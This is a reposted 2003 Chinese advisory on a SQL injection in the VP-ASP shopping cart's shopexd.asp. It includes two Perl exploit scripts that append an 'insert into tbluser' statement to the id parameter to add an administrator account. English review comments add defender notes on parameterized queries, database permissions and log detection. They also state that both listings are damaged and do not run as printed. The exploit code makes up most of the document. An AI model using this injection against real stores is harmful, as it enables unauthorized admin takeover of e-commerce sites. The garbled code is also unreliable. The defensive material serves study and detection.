[转帖] VPASP SQL漏洞及利用代码
VPASP SQL漏洞及利用代码
Joker@safechina.net
www.safechina.net
日期: 05/07/2003
平台: Win32/MSSQL
级别: 高
BUG类型: SQL入侵
发现者: AresU & TioEuy
厂商网址: http://www.vpasp.com/
介绍:
VP-ASP是一个应用于超过70个国家,功能强大的电子商务解决方案
VP-ASP的特点是使用方便和强大的无限制的客户定制功能
更深入的了解请访问 http://www.vpasp.com
细节:
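当我们阅读vpasp的源代码时,我们在shopexd.asp中发现了一个SQL注入漏洞:从下面的请求构造可以看出,id参数的内容会被带入后端的SQL语句,因此可以在它后面追加额外的语句.利用这个漏洞并不难.
以管理员权限添加一个新用户即可获得Web界面管理的全部权限.
防护要点:对id参数做整数校验并改用参数化查询;Web应用连接数据库所用的帐号不应拥有不必要的写权限;同时检查tbluser表中是否有来历不明的帐号,并在Web日志中查找对shopexd.asp的、id参数里带有分号和insert into的请求.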
Exploits/POC:(用/usr/bin/perl -w 运行)
《Code 1》
# First listing: builds and sends the single HTTP request used against the
# shopexd.asp SQL injection described in the post.
#
# NOTE(review): this listing reached the page damaged. The string opened on the
# next line is not closed where the author intended and the usage text has lost
# its argument list, so the script does not parse as printed. It is reproduced
# unchanged; no comment is added further down because the misplaced quotes make
# it impossible to tell code from string content line by line.
#
# What the visible statements do:
#   * fewer than four command-line arguments ($#ARGV < 3) prints usage and exits;
#   * the URL is <arg0>/shopexd.asp?id=<arg1>, followed by ';' and an INSERT
#     into tbluser (fldusername, fldpassword, fldaccess) whose values are
#     <arg2>, <arg3> and the list 1..29 held in $biji, then '--';
#   * the URL is sent as one GET through LWP::UserAgent; on an HTTP error the
#     status line is printed, otherwise "Tuing !". A non-error HTTP response
#     says nothing about whether the INSERT actually ran.
#
# Defender notes:
#   * The request only has an effect if shopexd.asp places the id value into a
#     SQL statement unvalidated -- presumably by string concatenation; the ASP
#     source is not shown here. Validating id as an integer and binding it as a
#     query parameter removes the injection point.
#   * The database login used by the web application should not hold rights it
#     does not need; the appended statement depends on INSERT rights on tbluser.
#   * Detection: requests for shopexd.asp whose id value contains ';' or the
#     text "insert into tbluser" in web server logs, and rows in tbluser that no
#     administrator created. An unmodified LWP::UserAgent sends a User-Agent
#     starting with "libwww-perl", which is a weak but cheap log filter.
$pamer = "
use LWP::UserAgent; # LWP Mode sorry im lazy :)
use HTTP::Request;
use HTTP::Response;
$│ = 1;
print $pamer;
if ($#ARGV<3){
print "\n Usage: perl tio-fux.pl
\n\n";
exit;
}
my $biji =
"1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,
29";
$tio = "$ARGV[0]/shopexd.asp?id=$ARGV[1]";
$tio .= ";insert into tbluser
(\"fldusername\",\"fldpassword\",\"fldaccess\") ";
$tio .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";
my $bosen = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $tio);
my $dodol = $bosen->request($gembel);
if ($dodol->is_error()) {
printf " s\n", $dodol->status_line;
} else {
print "Tuing !\n";
}
print "\n680165\n";
--END--
《Code 2》
--------
#!/usr/bin/perl
# ==============================
# VP-ASP Shopping Cart - Exploit
#
# Second listing: same request as the first one, sent over a raw TCP socket
# through sendraw() instead of LWP.
# NOTE(review): parts of this listing were damaged in extraction (see the notes
# at the individual lines); the code is reproduced unchanged.
#
# Defender notes: the request is only effective if shopexd.asp puts the id value
# into a SQL statement unvalidated (presumably by concatenation; the ASP source
# is not shown). Integer validation plus a bound query parameter closes the
# injection point, and a database login without INSERT rights on tbluser limits
# the impact. In logs, look for shopexd.asp requests whose id value carries ';'
# and "insert into tbluser"; the request built below is HTTP/1.0 with a Host
# header and nothing else, so it also arrives without a User-Agent.
use Socket;
# Banner printed together with the usage text.
$dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU ";
# Value written to fldaccess: the numbers 1..29. Presumably one entry per
# administrative permission -- verify against the product's schema.
$aksesnya
="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
,29";
# Column list of the row that gets added to tbluser.
$pieldnya = '"fldusername","fldpassword","fldaccess"';
# Five arguments are required. As used below: [0] host, [1] path prefix placed
# before shopexd.asp, [2] id value, [3] and [4] the values for fldusername and
# fldpassword. The usage line itself has lost its argument list.
if ($#ARGV<4)
{
print "\n$dodolbasik";
print "\n\n Usage: perl tioeuy.pl
\n\n";
exit;
}
# Request path: the id value is followed by ';' and a second statement, and the
# trailing '--' turns whatever the page appends afterwards into a SQL comment.
$kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser
($pieldnya)
values ('$ARGV[3]','$ARGV[4]','$aksesnya')--";
# As printed, every space is replaced by the text "20".
# NOTE(review): looks like an encoding step damaged in extraction; kept as found.
$kupret=~s/\ /20/g;
# Wrap the path into a minimal HTTP/1.0 request: request line and Host only.
$kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n";
print $kupret;
# Globals read by sendraw(): fixed port 80 and the packed address of the host.
$port=80;
$host=$ARGV[0];
$target = inet_aton($host);
@hasil=sendraw($kupret);
# $gembel is never assigned in this listing, so this print emits nothing.
print $gembel;
# Whatever sendraw() returned is printed as-is.
print @hasil;
# sendraw($pstr): opens a TCP connection to the globals $target/$port, writes
# $pstr to it and returns the list collected in @in. When connect() fails the
# sub falls off the end without an explicit return value.
# NOTE(review): the box-drawing characters and the empty while() condition below
# are extraction damage; the sub does not run as printed and is kept as found.
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
# Bareword handle S is created here; a failure dies with "Socket problems".
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')││0) ││
die("Socket problems\n");
# The socket address is packed by hand: a short with value 2, the port in
# network byte order, the 4-byte address, and 8 bytes of padding.
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
# S becomes the default output handle so that the bare print writes the
# request to the socket.
select(S); $│=1; print $pstr;
# Collects $_ into @in; as printed the loop condition is empty.
while(){ push @in, $_;}
# Restore STDOUT as default output, close the socket, hand back the lines.
select(STDOUT); close(S); return @in;
}
}
--END--